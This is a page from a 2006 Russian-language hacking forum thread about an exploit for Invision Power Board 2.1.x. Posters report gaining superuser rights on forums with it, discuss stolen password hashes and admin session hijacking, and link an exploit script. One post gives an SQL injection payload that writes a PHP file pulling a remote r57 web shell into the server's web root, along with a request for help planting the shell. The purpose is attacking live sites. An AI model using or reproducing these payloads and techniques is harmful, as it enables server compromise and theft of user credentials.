ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 17.07.2006, 21:09
Vilen
Познающий
Регистрация: 01.07.2006
Сообщений: 56
Провел на форуме:
107723

Репутация: 11
По умолчанию

- - -

Последний раз редактировалось Vilen; 01.12.2008 в 23:59..
 
Ответить с цитированием

  #22  
Старый 17.07.2006, 21:43
Brahma
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678

Репутация: 31
По умолчанию

Вполне возможно что твой аккаунт забанили, насколько я знаю - эксп. RST оставляет сообщение, благодаря которому и существует возможность sql inj. Попробуй создать другой аккаунт.
P.S. и действовать быстро.
 
Ответить с цитированием

  #23  
Старый 17.07.2006, 23:32
Vilen
Познающий
Регистрация: 01.07.2006
Сообщений: 56
Провел на форуме:
107723

Репутация: 11
По умолчанию

- - -

Последний раз редактировалось Vilen; 01.12.2008 в 23:54..
 
Ответить с цитированием

  #24  
Старый 18.07.2006, 00:33
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

Exploit для IPB работает нормально, я так уже стал сеперюзером на форуме
 
Ответить с цитированием

  #25  
Старый 18.07.2006, 07:41
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

сразу извиняюсь, я ipb не очень знаком
как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?
 
Ответить с цитированием

  #26  
Старый 18.07.2006, 07:48
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
По умолчанию

А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.
 
Ответить с цитированием

  #27  
Старый 18.07.2006, 22:55
Brahma
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678

Репутация: 31
По умолчанию

Цитата:
сразу извиняюсь, я ipb не очень знаком
как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?
Советую открыть исходник, имхо.
 
Ответить с цитированием

  #28  
Старый 19.07.2006, 05:26
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
Советую открыть исходник, имхо.
Исходник чего?форума? так как в exploite происходит только извлечение этого поля из бд.
Цитата:
А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.
тогда я непонимаю логику создателей форума, для чего такое надо.
Цитата:
Maybe admin session not exist. Please try later.
в какой момент создается его сессия, когда он появляется на форуме? И только тогда можно получить его сессию?
 
Ответить с цитированием

  #29  
Старый 19.07.2006, 12:23
zeppe1in
Постоянный
Регистрация: 12.07.2006
Сообщений: 327
Провел на форуме:
1654818

Репутация: 117
По умолчанию

По поводу сплойта
кто знает как выглядит Client_ip в хттп запросе?
 
Ответить с цитированием

  #30  
Старый 28.07.2006, 06:46
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Хай всем!
Хочу залить шелл через IPB 2.1.5
Юзаю http://rst.void.ru/download/r57ipb216gui.txt хэш ворует, ссесию тоже, а вот нового админа не создаёт! И скоко я не смотрел сорс, ничё не понимаю! Пытался и руками куда-то в сплоит дописать как последний ламер
Код:
UNION INSERT INTO ibf_faq (id, title, text, description) VALUES(\'98\', \'shell\', \'<? require \\\"http://rst.void.ru/download/r57shell.txt\\\" ?>\', \'To hack this server\'); SELECT text INTO OUTFILE \'C:/AppServ/www/db.php\' FROM ibf_faq where id = \\\"98\\\";
Но он не создаёт такого файла (В C:/AppServ/www/ уверен, админ оставил phpinfo.php )
Кто поможет сакс хакеру залить шелл?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Форумы 19 18.11.2006 09:19
Уязвимость Invision Power Board 2.1.5 Go0o$E Форумы 106 05.05.2006 21:35
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ